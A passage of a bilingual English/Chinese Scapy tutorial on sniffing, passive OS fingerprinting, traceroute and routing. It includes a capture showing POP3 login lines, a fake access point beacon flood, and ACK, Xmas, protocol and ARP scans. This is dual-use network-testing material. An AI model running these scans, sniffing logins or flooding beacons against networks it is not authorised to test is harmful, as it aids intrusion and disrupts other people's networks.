???????? load????? = 'B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\x22#$%&\'()*+,-./01234567'
---[ Ethernet ]---
dst?????? = 00:02:15:37:a2:44
src?????? = 00:ae:f3:52:aa:d1
type????? = 0x800
---[ IP ]---
?? version?? = 4L
?? ihl?????? = 5L
?? tos?????? = 0x0
?? len?????? = 84
?? id??????? = 2070
?? flags???? =
?? frag????? = 0L
?? ttl?????? = 42
?? proto???? = ICMP
?? chksum??? = 0x861b
?? src?????? = 66.35.250.151
?? dst?????? = 192.168.5.21
?? options?? = ''
---[ ICMP ]---
????? type????? = echo-reply
????? code????? = 0
????? chksum??? = 0x91d9
????? id??????? = 0xc245
????? seq?????? = 0x0
---[ Raw ]---
???????? load????? = 'B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\x22#$%&\'()*+,-./01234567'
---[ Padding ]---
??????????? load????? = '\n_\x00\x0b'

For even more control over displayed information we can use the?sprintf()?function:

對于控制輸出信息,我們可以使用“sprintf()”函數(shù):

>>> pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
192.168.1.100 -> 64.233.167.99

64.233.167.99 -> 192.168.1.100

192.168.1.100 -> 64.233.167.99

192.168.1.100 -> 64.233.167.99
'GET / HTTP/1.1\r\nHost: 64.233.167.99\r\nUser-Agent: Mozilla/5.0
(X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy)
Firefox/2.0.0.8\r\nAccept: text/xml,application/xml,application/xhtml+xml,
text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Language:
en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset:
ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection:
keep-alive\r\nCache-Control: max-age=0\r\n\r\n'

We can sniff and do passive OS fingerprinting:

我們可以嗅探并進行被動操作系統(tǒng)指紋識別:

>>> p
<Ether dst=00:10:4b:b3:7d:4e src=00:40:33:96:7b:60 type=0x800 |<IP version=4L
?ihl=5L tos=0x0 len=60 id=61681 flags=DF frag=0L ttl=64 proto=TCP chksum=0xb85e
?src=192.168.8.10 dst=192.168.8.1 options='' |<TCP sport=46511 dport=80
?seq=2023566040L ack=0L dataofs=10L reserved=0L flags=SEC window=5840
?chksum=0x570c urgptr=0 options=[('Timestamp', (342940201L, 0L)), ('MSS', 1460),
?('NOP', ()), ('SAckOK', ''), ('WScale', 0)] |>>>
>>> load_module("p0f")
>>> p0f(p)
(1.0, ['Linux 2.4.2 - 2.4.14 (1)'])
>>> a=sniff(prn=prnp0f)
(1.0, ['Linux 2.4.2 - 2.4.14 (1)'])
(1.0, ['Linux 2.4.2 - 2.4.14 (1)'])
(0.875, ['Linux 2.4.2 - 2.4.14 (1)', 'Linux 2.4.10 (1)', 'Windows 98 (?)'])
(1.0, ['Windows 2000 (9)'])

The number before the OS guess is the accurracy of the guess.

猜測操作系統(tǒng)版本前的數(shù)字為猜測的精確度。

Filters

Demo of both bpf filter and sprintf() method:

演示一下bpf過濾器和sprintf()方法:

>>> a=sniff(filter="tcp and ( port 25 or port 110 )",
?prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%? %2s,TCP.flags% : %TCP.payload%"))
192.168.8.10:47226 -> 213.228.0.14:110?? S :
213.228.0.14:110 -> 192.168.8.10:47226? SA :
192.168.8.10:47226 -> 213.228.0.14:110?? A :
213.228.0.14:110 -> 192.168.8.10:47226? PA : +OK <13103.1048117923@pop2-1.free.fr>

192.168.8.10:47226 -> 213.228.0.14:110?? A :
192.168.8.10:47226 -> 213.228.0.14:110? PA : USER toto

213.228.0.14:110 -> 192.168.8.10:47226?? A :
213.228.0.14:110 -> 192.168.8.10:47226? PA : +OK

192.168.8.10:47226 -> 213.228.0.14:110?? A :
192.168.8.10:47226 -> 213.228.0.14:110? PA : PASS tata

213.228.0.14:110 -> 192.168.8.10:47226? PA : -ERR authorization failed

192.168.8.10:47226 -> 213.228.0.14:110?? A :
213.228.0.14:110 -> 192.168.8.10:47226? FA :
192.168.8.10:47226 -> 213.228.0.14:110? FA :
213.228.0.14:110 -> 192.168.8.10:47226?? A :

Send and receive in a loop

在循環(huán)中接收和發(fā)送

Here is an example of a (h)ping-like functionnality : you always send the same set of packets to see if something change:

這兒有一個例子來實現(xiàn)類似(h)ping的功能:你一直發(fā)送同樣的數(shù)據(jù)包集合來觀察是否發(fā)生變化:

>>> srloop(IP(dst="www.target.com/30")/TCP())
RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding
fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S
RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding
fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S
RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding
fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S
RECV 1: Ether / IP / TCP 192.168.11.99:80 > 192.168.8.14:20 SA / Padding
fail 3: IP / TCP 192.168.8.14:20 > 192.168.11.96:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.98:80 S
??????? IP / TCP 192.168.8.14:20 > 192.168.11.97:80 S

Importing and Exporting Data

導(dǎo)入和導(dǎo)出數(shù)據(jù)

PCAP

It is often useful to save capture packets to pcap file for use at later time or with different applications

通常可以將數(shù)據(jù)包保存為pcap文件以備后用,或者是供其他的應(yīng)用程序使用:

>>> wrpcap("temp.cap",pkts)

To restore previously saved pcap file:

還原之前保存的pcap文件:

>>> pkts = rdpcap("temp.cap")

or

>>> pkts = sniff(offline="temp.cap")

Hexdump

Scapy allows you to export recorded packets in various hex formats.

Scapy允許你以不同的十六進制格式輸出編碼的數(shù)據(jù)包。

Use?hexdump()?to display one or more packets using classic hexdump format:

使用“hexdump()”函數(shù)會以經(jīng)典的hexdump格式輸出數(shù)據(jù)包:

>>> hexdump(pkt)
0000?? 00 50 56 FC CE 50 00 0C? 29 2B 53 19 08 00 45 00?? .PV..P..)+S...E.
0010?? 00 54 00 00 40 00 40 01? 5A 7C C0 A8 19 82 04 02?? .T..@.@.Z|......
0020?? 02 01 08 00 9C 90 5A 61? 00 01 E6 DA 70 49 B6 E5?? ......Za....pI..
0030?? 08 00 08 09 0A 0B 0C 0D? 0E 0F 10 11 12 13 14 15?? ................
0040?? 16 17 18 19 1A 1B 1C 1D? 1E 1F 20 21 22 23 24 25?? .......... !"#$%
0050?? 26 27 28 29 2A 2B 2C 2D? 2E 2F 30 31 32 33 34 35?? &'()*+,-./012345
0060?? 36 37????????????????????????????????????????????? 67

Hexdump above can be reimported back into Scapy using?import_hexcap():

使用“import_hexcap()”函數(shù)可以將以上的hexdump重新導(dǎo)入到Scapy中:

>>> pkt_hex = Ether(import_hexcap())
0000?? 00 50 56 FC CE 50 00 0C? 29 2B 53 19 08 00 45 00?? .PV..P..)+S...E.
0010?? 00 54 00 00 40 00 40 01? 5A 7C C0 A8 19 82 04 02?? .T..@.@.Z|......
0020?? 02 01 08 00 9C 90 5A 61? 00 01 E6 DA 70 49 B6 E5?? ......Za....pI..
0030?? 08 00 08 09 0A 0B 0C 0D? 0E 0F 10 11 12 13 14 15?? ................
0040?? 16 17 18 19 1A 1B 1C 1D? 1E 1F 20 21 22 23 24 25?? .......... !"#$%
0050?? 26 27 28 29 2A 2B 2C 2D? 2E 2F 30 31 32 33 34 35?? &'()*+,-./012345
0060?? 36 37????????????????????????????????????????????? 67
>>> pkt_hex
<Ether? dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP? version=4L
ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c
src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP? type=echo-request code=0
chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw? load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n
\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e
\x1f !"#$%&\'()*+,-./01234567' |>>>>

Hex string

You can also convert entire packet into a hex string using the?str()?function:

使用“str()”函數(shù)可以將整個數(shù)據(jù)包轉(zhuǎn)換成十六進制字符串:?

>>> pkts = sniff(count = 1)
>>> pkt = pkts[0]
>>> pkt
<Ether? dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP? version=4L
ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c
src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP? type=echo-request code=0
chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw? load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n
\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e
\x1f !"#$%&\'()*+,-./01234567' |>>>>
>>> pkt_str = str(pkt)
>>> pkt_str
'\x00PV\xfc\xceP\x00\x0c)+S\x19\x08\x00E\x00\x00T\x00\x00@\x00@\x01Z|\xc0\xa8
\x19\x82\x04\x02\x02\x01\x08\x00\x9c\x90Za\x00\x01\xe6\xdapI\xb6\xe5\x08\x00
\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b
\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./01234567'

We can reimport the produced hex string by selecting the appropriate starting layer (e.g.?Ether()).

通過選擇合適的起始層(例如“Ether()”),我們可以重新導(dǎo)入十六進制字符串。

>>> new_pkt = Ether(pkt_str)
>>> new_pkt
<Ether? dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP? version=4L
ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c
src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP? type=echo-request code=0
chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw? load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n
\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e
\x1f !"#$%&\'()*+,-./01234567' |>>>>

Base64

Using the?export_object()?function, Scapy can export a base64 encoded Python data structure representing a packet:

使用“export_object()”函數(shù),Scapy可以數(shù)據(jù)包轉(zhuǎn)換成base64編碼的Python數(shù)據(jù)結(jié)構(gòu):

>>> pkt
<Ether? dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP? version=4L
ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c
src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP? type=echo-request code=0
chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw? load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n
\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f
!"#$%&\'()*+,-./01234567' |>>>>
>>> export_object(pkt)
eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST
OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao
bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT
WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6
...

The output above can be reimported back into Scapy using?import_object():

使用“import_object()”函數(shù),可以將以上輸出重新導(dǎo)入到Scapy中:

>>> new_pkt = import_object()
eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST
OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao
bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT
WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6
...
>>> new_pkt
<Ether? dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP? version=4L
ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c
src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP? type=echo-request code=0
chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw? load='\xe6\xdapI\xb6\xe5\x08\x00\x08\t\n
\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f
!"#$%&\'()*+,-./01234567' |>>>>

Sessions

At last Scapy is capable of saving all session variables using the?save_session()?function:

最后可以使用“save_session()”函數(shù)來保存所有的session變量:

>>> dir()
['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_str', 'pkts']
>>> save_session("session.scapy")

Next time you start Scapy you can load the previous saved session using the?load_session()?command:

使用“l(fā)oad_session()”函數(shù),在下一次你啟動Scapy的時就能加載保存的session:

>>> dir()
['__builtins__', 'conf']
>>> load_session("session.scapy")
>>> dir()
['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_str', 'pkts']

Making tables

Now we have a demonstration of the?make_table()?presentation function. It takes a list as parameter, and a function who returns a 3-uple. The first element is the value on the x axis from an element of the list, the second is about the y value and the third is the value that we want to see at coordinates (x,y). The result is a table. This function has 2 variants,?make_lined_table()?and?make_tex_table()?to copy/paste into your LaTeX pentest report. Those functions are available as methods of a result object :

現(xiàn)在我們來演示一下“make_table()”函數(shù)的功能。該函數(shù)的需要一個列表和另一個函數(shù)(返回包含三個元素的元組)作為參數(shù)。第一個元素是表格x軸上的一個值,第二個元素是y軸上的值,第三個原始則是坐標(x,y)對應(yīng)的值,其返回結(jié)果為一個表格。這個函數(shù)有兩個變種,“make_lined_table()”和“make_tex_table()”來復(fù)制/粘貼到你的LaTeX報告中。這些函數(shù)都可以作為一個結(jié)果對象的方法:

Here we can see a multi-parallel traceroute (scapy already has a multi TCP traceroute function. See later):

在這里,我們可以看到一個多機并行的traceroute(Scapy的已經(jīng)有一個多TCP路由跟蹤功能,待會兒可以看到):

>>> ans,unans=sr(IP(dst="www.test.fr/30", ttl=(1,6))/TCP())
Received 49 packets, got 24 answers, remaining 0 packets
>>> ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )
? 216.15.189.192? 216.15.189.193? 216.15.189.194? 216.15.189.195
1 192.168.8.1???? 192.168.8.1???? 192.168.8.1???? 192.168.8.1
2 81.57.239.254?? 81.57.239.254?? 81.57.239.254?? 81.57.239.254
3 213.228.4.254?? 213.228.4.254?? 213.228.4.254?? 213.228.4.254
4 213.228.3.3???? 213.228.3.3???? 213.228.3.3???? 213.228.3.3
5 193.251.254.1?? 193.251.251.69? 193.251.254.1?? 193.251.251.69
6 193.251.241.174 193.251.241.178 193.251.241.174 193.251.241.178

Here is a more complex example to identify machines from their IPID field. We can see that 172.20.80.200:22 is answered by the same IP stack than 172.20.80.201 and that 172.20.80.197:25 is not answered by the sape IP stack than other ports on the same IP.

這里有個更復(fù)雜的例子:從他們的IPID字段中識別主機。我們可以看到172.20.80.200只有22端口做出了應(yīng)答,而172.20.80.201則對所有的端口都有應(yīng)答,而且172.20.80.197對25端口沒有應(yīng)答,但對其他端口都有應(yīng)答。

>>> ans,unans=sr(IP(dst="172.20.80.192/28")/TCP(dport=[20,21,22,25,53,80]))
Received 142 packets, got 25 answers, remaining 71 packets
>>> ans.make_table(lambda (s,r): (s.dst, s.dport, r.sprintf("%IP.id%")))
?? 172.20.80.196 172.20.80.197 172.20.80.198 172.20.80.200 172.20.80.201
20 0???????????? 4203????????? 7021????????? -???????????? 11562
21 0???????????? 4204????????? 7022????????? -???????????? 11563
22 0???????????? 4205????????? 7023????????? 11561???????? 11564
25 0???????????? 0???????????? 7024????????? -???????????? 11565
53 0???????????? 4207????????? 7025????????? -???????????? 11566
80 0???????????? 4028????????? 7026????????? -???????????? 11567

It can help identify network topologies very easily when playing with TTL, displaying received TTL, etc.

你在使用TTL和顯示接收到的TTL等情況下,它可以很輕松地幫你識別網(wǎng)絡(luò)拓撲結(jié)構(gòu)。

Routing

Now scapy has its own routing table, so that you can have your packets routed diffrently than the system:

現(xiàn)在Scapy有自己的路由表了,所以將你的數(shù)據(jù)包以不同于操作系統(tǒng)的方式路由:

>>> conf.route
Network???????? Netmask???????? Gateway???????? Iface
127.0.0.0?????? 255.0.0.0?????? 0.0.0.0???????? lo
192.168.8.0???? 255.255.255.0?? 0.0.0.0???????? eth0
0.0.0.0???????? 0.0.0.0???????? 192.168.8.1???? eth0
>>> conf.route.delt(net="0.0.0.0/0",gw="192.168.8.1")
>>> conf.route.add(net="0.0.0.0/0",gw="192.168.8.254")
>>> conf.route.add(host="192.168.1.1",gw="192.168.8.1")
>>> conf.route
Network???????? Netmask???????? Gateway???????? Iface
127.0.0.0?????? 255.0.0.0?????? 0.0.0.0???????? lo
192.168.8.0???? 255.255.255.0?? 0.0.0.0???????? eth0
0.0.0.0???????? 0.0.0.0???????? 192.168.8.254?? eth0
192.168.1.1???? 255.255.255.255 192.168.8.1???? eth0
>>> conf.route.resync()
>>> conf.route
Network???????? Netmask???????? Gateway???????? Iface
127.0.0.0?????? 255.0.0.0?????? 0.0.0.0???????? lo
192.168.8.0???? 255.255.255.0?? 0.0.0.0???????? eth0
0.0.0.0???????? 0.0.0.0???????? 192.168.8.1???? eth0

Gnuplot

We can easily plot some harvested values using Gnuplot. (Make sure that you have Gnuplot-py and Gnuplot installed.) For example, we can observe the IP ID patterns to know how many distinct IP stacks are used behind a load balancer:

我們可以很容易地將收集起來的數(shù)據(jù)繪制成Gnuplot。(清確保你已經(jīng)安裝了Gnuplot-py和Gnuplot)例如,我們可以通過觀察圖案知道負載平衡器用了多少個不同的IP堆棧:

>>> a,b=sr(IP(dst="www.target.com")/TCP(sport=[RandShort()]*1000))
>>> a.plot(lambda x:x[1].id)
<Gnuplot._Gnuplot.Gnuplot instance at 0xb7d6a74c>

TCP traceroute (2)

Scapy also has a powerful TCP traceroute function. Unlike other traceroute programs that wait for each node to reply before going to the next, scapy sends all the packets at the same time. This has the disadvantage that it can’t know when to stop (thus the maxttl parameter) but the great advantage that it took less than 3 seconds to get this multi-target traceroute result:

Scapy也有強大的TCP traceroute功能。并不像其他traceroute程序那樣,需要等待每個節(jié)點的回應(yīng)才去下一個節(jié)點,scapy會在同一時間發(fā)送所有的數(shù)據(jù)包。其缺點就是不知道什么時候停止(所以就有maxttl參數(shù)),其巨大的優(yōu)點就是,只用了不到3秒,就可以得到多目標的traceroute結(jié)果:

>>> traceroute(["www.yahoo.com","www.altavista.com","www.wisenut.com","www.copernic.com"],maxttl=20)
Received 80 packets, got 80 answers, remaining 0 packets
?? 193.45.10.88:80??? 216.109.118.79:80? 64.241.242.243:80? 66.94.229.254:80
1? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1
2? 82.243.5.254?????? 82.243.5.254?????? 82.243.5.254?????? 82.243.5.254
3? 213.228.4.254????? 213.228.4.254????? 213.228.4.254????? 213.228.4.254
4? 212.27.50.46?????? 212.27.50.46?????? 212.27.50.46?????? 212.27.50.46
5? 212.27.50.37?????? 212.27.50.41?????? 212.27.50.37?????? 212.27.50.41
6? 212.27.50.34?????? 212.27.50.34?????? 213.228.3.234????? 193.251.251.69
7? 213.248.71.141???? 217.118.239.149??? 208.184.231.214??? 193.251.241.178
8? 213.248.65.81????? 217.118.224.44???? 64.125.31.129????? 193.251.242.98
9? 213.248.70.14????? 213.206.129.85???? 64.125.31.186????? 193.251.243.89
10 193.45.10.88??? SA 213.206.128.160??? 64.125.29.122????? 193.251.254.126
11 193.45.10.88??? SA 206.24.169.41????? 64.125.28.70?????? 216.115.97.178
12 193.45.10.88??? SA 206.24.226.99????? 64.125.28.209????? 66.218.64.146
13 193.45.10.88??? SA 206.24.227.106???? 64.125.29.45?????? 66.218.82.230
14 193.45.10.88??? SA 216.109.74.30????? 64.125.31.214????? 66.94.229.254?? SA
15 193.45.10.88??? SA 216.109.120.149??? 64.124.229.109???? 66.94.229.254?? SA
16 193.45.10.88??? SA 216.109.118.79? SA 64.241.242.243? SA 66.94.229.254?? SA
17 193.45.10.88??? SA 216.109.118.79? SA 64.241.242.243? SA 66.94.229.254?? SA
18 193.45.10.88??? SA 216.109.118.79? SA 64.241.242.243? SA 66.94.229.254?? SA
19 193.45.10.88??? SA 216.109.118.79? SA 64.241.242.243? SA 66.94.229.254?? SA
20 193.45.10.88??? SA 216.109.118.79? SA 64.241.242.243? SA 66.94.229.254?? SA
(<Traceroute: UDP:0 TCP:28 ICMP:52 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>)

The last line is in fact a the result of the function : a traceroute result object and a packet list of unanswered packets. The traceroute result is a more specialised version (a subclass, in fact) of a classic result object. We can save it to consult the traceroute result again a bit later, or to deeply inspect one of the answers, for example to check padding.

最后一行實際上是該函數(shù)的返回結(jié)果:traceroute返回一個對象和無應(yīng)答數(shù)據(jù)包列表。traceroute返回的是一個經(jīng)典返回對象更加特殊的版本(實際上是一個子類)。我們可以將其保存以備后用,或者是進行一些例如檢查填充的更深層次的觀察:

>>> result,unans=_
>>> result.show()
?? 193.45.10.88:80??? 216.109.118.79:80? 64.241.242.243:80? 66.94.229.254:80
1? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1
2? 82.251.4.254?????? 82.251.4.254?????? 82.251.4.254?????? 82.251.4.254
3? 213.228.4.254????? 213.228.4.254????? 213.228.4.254????? 213.228.4.254
[...]
>>> result.filter(lambda x: Padding in x[1])

Like any result object, traceroute objects can be added :

和其他返回對象一樣,traceroute對象也可以相加:

>>> r2,unans=traceroute(["www.voila.com"],maxttl=20)
Received 19 packets, got 19 answers, remaining 1 packets
?? 195.101.94.25:80
1? 192.168.8.1
2? 82.251.4.254
3? 213.228.4.254
4? 212.27.50.169
5? 212.27.50.162
6? 193.252.161.97
7? 193.252.103.86
8? 193.252.103.77
9? 193.252.101.1
10 193.252.227.245
12 195.101.94.25?? SA
13 195.101.94.25?? SA
14 195.101.94.25?? SA
15 195.101.94.25?? SA
16 195.101.94.25?? SA
17 195.101.94.25?? SA
18 195.101.94.25?? SA
19 195.101.94.25?? SA
20 195.101.94.25?? SA
>>>
>>> r3=result+r2
>>> r3.show()
?? 195.101.94.25:80?? 212.23.37.13:80??? 216.109.118.72:80? 64.241.242.243:80? 66.94.229.254:80
1? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1
2? 82.251.4.254?????? 82.251.4.254?????? 82.251.4.254?????? 82.251.4.254?????? 82.251.4.254
3? 213.228.4.254????? 213.228.4.254????? 213.228.4.254????? 213.228.4.254????? 213.228.4.254
4? 212.27.50.169????? 212.27.50.169????? 212.27.50.46?????? -????????????????? 212.27.50.46
5? 212.27.50.162????? 212.27.50.162????? 212.27.50.37?????? 212.27.50.41?????? 212.27.50.37
6? 193.252.161.97???? 194.68.129.168???? 212.27.50.34?????? 213.228.3.234????? 193.251.251.69
7? 193.252.103.86???? 212.23.42.33?????? 217.118.239.185??? 208.184.231.214??? 193.251.241.178
8? 193.252.103.77???? 212.23.42.6??????? 217.118.224.44???? 64.125.31.129????? 193.251.242.98
9? 193.252.101.1????? 212.23.37.13??? SA 213.206.129.85???? 64.125.31.186????? 193.251.243.89
10 193.252.227.245??? 212.23.37.13??? SA 213.206.128.160??? 64.125.29.122????? 193.251.254.126
11 -????????????????? 212.23.37.13??? SA 206.24.169.41????? 64.125.28.70?????? 216.115.97.178
12 195.101.94.25?? SA 212.23.37.13??? SA 206.24.226.100???? 64.125.28.209????? 216.115.101.46
13 195.101.94.25?? SA 212.23.37.13??? SA 206.24.238.166???? 64.125.29.45?????? 66.218.82.234
14 195.101.94.25?? SA 212.23.37.13??? SA 216.109.74.30????? 64.125.31.214????? 66.94.229.254?? SA
15 195.101.94.25?? SA 212.23.37.13??? SA 216.109.120.151??? 64.124.229.109???? 66.94.229.254?? SA
16 195.101.94.25?? SA 212.23.37.13??? SA 216.109.118.72? SA 64.241.242.243? SA 66.94.229.254?? SA
17 195.101.94.25?? SA 212.23.37.13??? SA 216.109.118.72? SA 64.241.242.243? SA 66.94.229.254?? SA
18 195.101.94.25?? SA 212.23.37.13??? SA 216.109.118.72? SA 64.241.242.243? SA 66.94.229.254?? SA
19 195.101.94.25?? SA 212.23.37.13??? SA 216.109.118.72? SA 64.241.242.243? SA 66.94.229.254?? SA
20 195.101.94.25?? SA 212.23.37.13??? SA 216.109.118.72? SA 64.241.242.243? SA 66.94.229.254?? SA

Traceroute result object also have a very neat feature: they can make a directed graph from all the routes they got, and cluster them by AS. You will need graphviz. By default, ImageMagick is used to display the graph.

Traceroute返回對象有一個非常實用的功能:他們會將得到的所有路線做成一個有向圖,并用AS組織路線。你需要安裝graphviz。在默認情況下會使用ImageMagick顯示圖形。

>>> res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com","www.wanadoo.fr","www.pacsec.com"],dport=[80,443],maxttl=20,retry=-2)
Received 190 packets, got 190 answers, remaining 10 packets
?? 193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198.133.219.25:80? 207.46...
1? 192.168.8.1???????? 192.168.8.1??????? 192.168.8.1??????? 192.168.8.1??????? 192.16...
2? 82.251.4.254??????? 82.251.4.254?????? 82.251.4.254?????? 82.251.4.254?????? 82.251...
3? 213.228.4.254?????? 213.228.4.254????? 213.228.4.254????? 213.228.4.254????? 213.22...
[...]
>>> res.graph()????????????????????????? # piped to ImageMagick's display program. Image below.
>>> res.graph(type="ps",target="| lp")?? # piped to postscript printer
>>> res.graph(target="> /tmp/graph.svg") # saved to file

If you have VPython installed, you also can have a 3D representation of the traceroute. With the right button, you can rotate the scene, with the middle button, you can zoom, with the left button, you can move the scene. If you click on a ball, it’s IP will appear/disappear. If you Ctrl-click on a ball, ports 21, 22, 23, 25, 80 and 443 will be scanned and the result displayed:

如果你安裝了VPython,你就可以用3D來表示traceroute。右邊的按鈕是旋轉(zhuǎn)圖案,中間的按鈕是放大縮小,左邊的按鈕是移動圖案。如果你單擊一個球,它的IP地址就會出現(xiàn)/消失。如果你按住Ctrl單擊一個球,就會掃描21,22,23,25,80443端口,并顯示結(jié)果:

>>> res.trace3D()

Wireless frame injection

Provided that your wireless card and driver are correctly configured for frame injection

frame injection的前提是你的無線網(wǎng)卡和驅(qū)動得正確配置好。

$ ifconfig wlan0 up
$ iwpriv wlan0 hostapd 1
$ ifconfig wlan0ap up

you can have a kind of FakeAP:

你可以造一個FakeAP

>>> sendp(Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/
????????? Dot11Beacon(cap="ESS")/
????????? Dot11Elt(ID="SSID",info=RandString(RandNum(1,50)))/
????????? Dot11Elt(ID="Rates",info='\x82\x84\x0b\x16')/
????????? Dot11Elt(ID="DSset",info="\x03")/
????????? Dot11Elt(ID="TIM",info="\x00\x01\x00\x00"),iface="wlan0ap",loop=1)

Simple one-liners

ACK Scan

Using Scapy’s powerful packet crafting facilities we can quick replicate classic TCP Scans. For example, the following string will be sent to simulate an ACK Scan:

>>> ans,unans = sr(IP(dst="www.slashdot.org")/TCP(dport=[80,666],flags="A"))

We can find unfiltered ports in answered packets:

>>> for s,r in ans:
... ????if s[TCP].dport == r[TCP].sport:
... ???????print str(s[TCP].dport) + " is unfiltered"

Similarly, filtered ports can be found with unanswered packets:

>>> for s in unans:
... ????print str(s[TCP].dport) + " is filtered"

Xmas Scan

Xmas Scan can be launced using the following command:

>>> ans,unans = sr(IP(dst="192.168.1.1")/TCP(dport=666,flags="FPU") )

Checking RST responses will reveal closed ports on the target.

IP Scan

A lower level IP Scan can be used to enumerate supported protocols:

>>> ans,unans=sr(IP(dst="192.168.1.1",proto=(0,255))/"SCAPY",retry=2)

ARP Ping

The fastest way to discover hosts on a local ethernet network is to use the ARP Ping method:

>>> ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)

Answers can be reviewed with the following command:

>>> ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") )

